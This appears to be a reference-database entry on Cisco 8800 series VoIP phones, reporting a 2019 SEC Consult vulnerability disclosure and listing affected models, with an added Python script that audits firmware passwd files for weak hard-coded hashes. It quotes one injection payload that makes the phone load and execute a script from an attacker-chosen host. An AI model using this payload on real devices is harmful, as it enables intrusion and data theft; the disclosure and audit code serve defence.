Developers: Cisco Systems
Technology: IP telephony, Office equipment
The 8800 series comprises Cisco's corporate VoIP phone models.
2019
Vulnerability in Cisco 8800 series VoIP phones that allows data theft
SEC Consult announced on January 9, 2019 that it had found a number of problems in the firmware of the popular Cisco VoIP Phone 8800 Internet telephony systems.
According to the report, one of the key problems is that JavaScript-like code can be injected using the built-in T9 keypad. In other words, an attacker can use the VoIP phone's built-in alphanumeric keypad to enter malicious code.
For example, the phone's host name can be changed to code along these lines:
<img src=http://$IP/sec.js onload=exec()>hostname`>,
The phone will then dutifully download the external file (sec.js) from a remote source and execute it.
In addition, the phones' firmware contains numerous outdated, and therefore unsafe, code libraries as well as hard-coded login credentials. They are stored as hashes in the file with the telling name /etc/passwd; the hashing uses the outdated UNIX MD5+salt algorithm and, as it turned out, the passwords are very weak, so cracking them and gaining access to the device over SSH was a trivial task.
The vulnerabilities were detected with SEC Consult's own IoT Inspector platform, which is designed to find problems in the firmware of Internet of Things devices.
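A check of the kind a firmware audit can run for the hard-coded credentials described above, as an added example (not SEC Consult's or IoT Inspector's code): it parses a passwd file extracted from a firmware image and reports accounts whose password hash is embedded in it, flagging md5crypt and other weak schemes. The function names and the sample file are constructed for illustration.

```python
import re

# crypt(3) hash prefixes mapped to (scheme name, treated as weak today)
SCHEMES = {
    "$1$": ("md5crypt", True),        # the "UNIX MD5+salt" scheme
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$2a$": ("bcrypt", False), "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
    "$y$": ("yescrypt", False),
}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")   # traditional DES crypt
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

def classify_hash(field):
    """Classify a passwd password field; None means no hash is exposed here."""
    if field == "":
        return ("empty", True)                 # account needs no password at all
    if field == "x" or field[0] in "!*":
        return None                            # shadowed or locked
    for prefix, result in SCHEMES.items():
        if field.startswith(prefix):
            return result
    # Unrecognised formats are reported as weak so that a human reviews them.
    return ("descrypt", True) if DES_RE.match(field) else ("unknown", True)

def audit_passwd(text):
    """Return one finding per account whose credential is embedded in passwd."""
    findings = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7:
            continue                           # skip blanks, comments, malformed lines
        user, field, shell = parts[0], parts[1], parts[6]
        result = classify_hash(field)
        if result is not None:
            scheme, weak = result
            findings.append({"user": user, "scheme": scheme, "weak": weak,
                             "interactive": shell not in NOLOGIN_SHELLS})
    return findings

# Constructed sample, not taken from any real firmware image.
SAMPLE = """\
root:$1$CONSTRCT$0123456789abcdefghijkl:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
service:$6$CONSTRUCTEDSALT$placeholderhashvalue:1000:1000::/home/service:/bin/sh
www:x:33:33::/var/www:/sbin/nologin
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE):
        print(finding)
```

Any finding means a credential ships inside the image and is identical on every device running it; an entry that is both weak and interactive deserves the highest priority.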
A manual analysis was also carried out; it revealed undocumented but easily exploitable functions in the phones' firmware that allow a potential attacker to output memory dumps and, consequently, to steal data.
"This problem cannot be called ordinary," believes Oleg Galushkin, security director of SEC Consult Services, the Russian representative office of SEC Consult. "Cisco 8800 series VoIP phones are actively used worldwide in the public sector and in large business; this also applies to Russia, where these devices are popular in the largest corporations. Such vulnerabilities pose a strategic threat to business if only because they are very easy to exploit; in such cases the theft of critical data also becomes 'commonplace'."
The described vulnerabilities were found in the firmware of Cisco IP Phone 88xx, version 2-0-1 of ES-15 (ID: f86aa7612d9311e6).[1] According to data provided by Cisco, the vulnerabilities affect[1] the following models:
- IP Conference Phone 8832
- IP Phone 8811
- IP Phone 8841
- IP Phone 8845
- IP Phone 8851
- IP Phone 8861
- IP Phone 8865
- Unified IP Conference Phone 8831
- Wireless IP Phone 8821
- Wireless IP Phone 8821-EX
According to SEC Consult, the vendor has already made the necessary fixes.
Series 8800 lineup
As of January 2019, the Cisco 8800 series VoIP phone lineup includes:
- Cisco IP Conference Phone 8832
- Cisco IP Phone 8865 Key Expansion Module
- Cisco IP Phone 8865
- Cisco IP Phone 8861
- Cisco IP Phone 8851
- Cisco IP Phone 8851/8861 Key Expansion Module
- Cisco IP Phone 8845
- Cisco IP Phone 8841
- Cisco IP Phone 8811
- Cisco IP Phone 8800 Key Expansion Module
- Cisco Unified IP Conference Phone 8831
- Cisco Wireless IP Phone 8821
- Cisco Wireless IP Phone 8821-EX
Notes
- [1] Multiple vulnerabilities in Cisco VoIP Phones (CVE-2018-0461)